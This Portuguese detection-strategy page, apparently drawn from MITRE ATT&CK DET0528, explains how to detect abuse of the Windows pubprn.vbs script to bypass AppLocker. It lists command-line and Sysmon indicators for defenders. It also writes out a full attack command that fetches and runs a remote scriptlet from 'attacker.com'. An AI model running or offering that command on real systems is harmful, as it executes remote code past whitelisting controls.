det0528-detecting-remote-script-proxy-execution-via-pubprnvbs

# DET0528 — Detecting Remote Script Proxy Execution via PubPrn.vbs ## Descrição `PubPrn.vbs` é um script VBScript legítimo do Windows (`C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs`) originalmente destinado à públicação de impressoras no Active Directory. Adversários abusam deste script como proxy de execução ([[t1216-system-script-proxy-execution|T1216 — System Script Proxy Execution]]) para baixar e executar código remoto via COM scriptlet (`.sct`), contornando controles de AppLocker e whitelisting de aplicações. A chamada maliciosa típica é: `cscript //nologo C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://attacker.com/payload.sct`. Esta técnica é valiosa para atacantes porque `cscript.exe` e o script em si são binários/arquivos assinados pela Microsoft, frequentemente em listas de permissão. O payload scriptlet baixado remotamente executa código arbitrário (shellcode, download de segundo estágio) sem escrever em disco. A detecção deve focar na linha de comando do processo, específicamente no argumento que contém `script:` seguido de uma URL HTTP/HTTPS ou caminho UNC, que é o indicador canônico de abuso deste LOLBin. O monitoramento deve alertar para qualquer execução de `pubprn.vbs` com argumentos contendo `script:` seguido de URL, independentemente do contexto. Em ambientes corporativos modernos, não há caso de uso legítimo para esta invocação específica. A estratégia complementa a detecção de outras técnicas de proxy de execução via scripts Microsoft como `SyncAppvPublishingServer.vbs` e `manage-bde.wsf`. ## Indicadores de Detecção - `cscript.exe` ou `wscript.exe` executando `pubprn.vbs` com argumento contendo `script:http://` ou `script:https://` - Argumento `script:` seguido de URL ou caminho UNC em qualquer invocação de `pubprn.vbs` - Conexão de rede originada de `cscript.exe` ou `wscript.exe` para hosts externos após execução de `pubprn.vbs` - Criação de processo filho por `cscript.exe` executando `pubprn.vbs` (shellcode executado via scriptlet) - Acesso ao arquivo `pubprn.vbs` por processo que não sejá ferramentas de administração de impressão legítimas - Sysmon Event ID 3 (conexão de rede) com `Image` sendo `cscript.exe` após Event ID 1 com linha de comando suspeita ## Técnicas Relacionadas - [[t1216-system-script-proxy-execution|T1216 — System Script Proxy Execution]] — técnica principal coberta por esta estratégia - [[t1218-system-binary-proxy-execution|T1218 — System Binary Proxy Execution]] — família ampla de abuso de binários confiáveis - [[t1059-005-visual-basic|T1059.005 — Visual Basic]] — execução de VBScript malicioso via proxy - [[t1105-ingress-tool-transfer|T1105 — Ingress Tool Transfer]] — download de payload remoto via scriptlet - [[t1562-impair-defenses|T1562 — Impair Defenses]] — contorno de AppLocker e whitelisting ## Analytics Relacionadas - [[an1464-analytic-1464|AN1464 — Analytic 1464]] --- *Fonte: [MITRE ATT&CK — DET0528](https://attack.mitre.org/detectionstrategies/DET0528)*